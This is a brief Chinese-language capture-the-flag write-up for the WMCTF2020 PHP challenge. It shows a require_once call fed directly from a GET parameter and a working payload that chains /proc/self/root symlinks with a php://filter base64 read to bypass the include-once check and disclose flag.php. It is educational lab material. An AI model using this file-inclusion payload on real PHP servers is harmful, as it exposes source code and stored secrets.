[WMCTF2020]MakePHPGreatAgain2.0

1
2
3
4
5
6
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行

发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。

/proc/self指向当前进程的/proc/pid/
/proc/self/root/是指向/的符号链接

使用伪协议来读取flag,构造payload:

1
?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

参考链接:

https://blog.csdn.net/nigo134/article/details/125342182